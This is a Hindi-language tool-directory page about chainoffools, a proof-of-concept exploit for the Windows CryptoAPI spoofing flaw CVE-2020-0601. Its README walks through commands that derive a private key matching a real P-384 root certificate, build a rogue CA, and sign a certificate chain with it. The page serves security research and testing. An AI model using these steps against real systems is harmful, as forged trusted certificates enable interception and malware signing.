Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
chainoffools — CVE-2020-0601 Windows CryptoAPI स्पूफिंग भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एलिप्टिक कर्व कुंजी हेरफेर का उपयोग करके फर्जी CA प्रमाणपत्र निर्माण प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/kudelskisecurity/chainoffools
भेद्यता विश्लेषणकोड विश्लेषणशोषणक्रिप्टोग्राफीपेनिट्रेशन टेस्टिंग
GitHubkudelskisecurity/chainoffools

chainoffools

CVE-2020-0601 Windows CryptoAPI स्पूफिंग भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एलिप्टिक कर्व कुंजी हेरफेर का उपयोग करके फर्जी CA प्रमाणपत्र निर्माण प्रदर्शित करता है।

रिपॉजिटरी देखें
3358183 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CryptoAPI

CVE-2020-0601: विंडोज़ CryptoAPI स्पूफिंग भेद्यता शोषण। हमारे ब्लॉग पोस्ट में अधिक जानकारी।

आवश्यकताएँ स्थापित करें

pip install -U -r requirements.txt

प्रमाणपत्र निर्माण OpenSSL संस्करण 1.0.2u तक काम करता है।

CA प्रमाणपत्र

हमने USERTrust ECC प्रमाणन प्राधिकरण का उपयोग किया लेकिन यह P-384 वक्र पर काम करने वाला कोई भी रूट प्रमाणपत्र हो सकता है।

रूट प्रमाणपत्र से सार्वजनिक कुंजी से मेल खाने वाली निजी कुंजी उत्पन्न करने के लिए हमने स्क्रिप्ट gen-key.py का उपयोग किया (Python 3.6 और उससे ऊपर पर काम करता है):

$ ./gen-key.py RootCert.pem 

कुंजी को इसके साथ प्रदर्शित किया जा सकता है:

$ openssl ec -in p384-key-rogue.pem -text

फिर रोग CA उत्पन्न करने के लिए:

$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

फिर हम निम्नलिखित निजी कुंजी और प्रमाणपत्र उत्पन्न करते हैं:

openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

अंत में एक फ़ाइल में पूर्ण श्रृंखला प्राप्त करने के लिए हम CA और सर्वर प्रमाणपत्रों को जोड़ते हैं:

cat client-cert.pem ca-rogue.pem > cert.pem
टूल डाउनलोड करें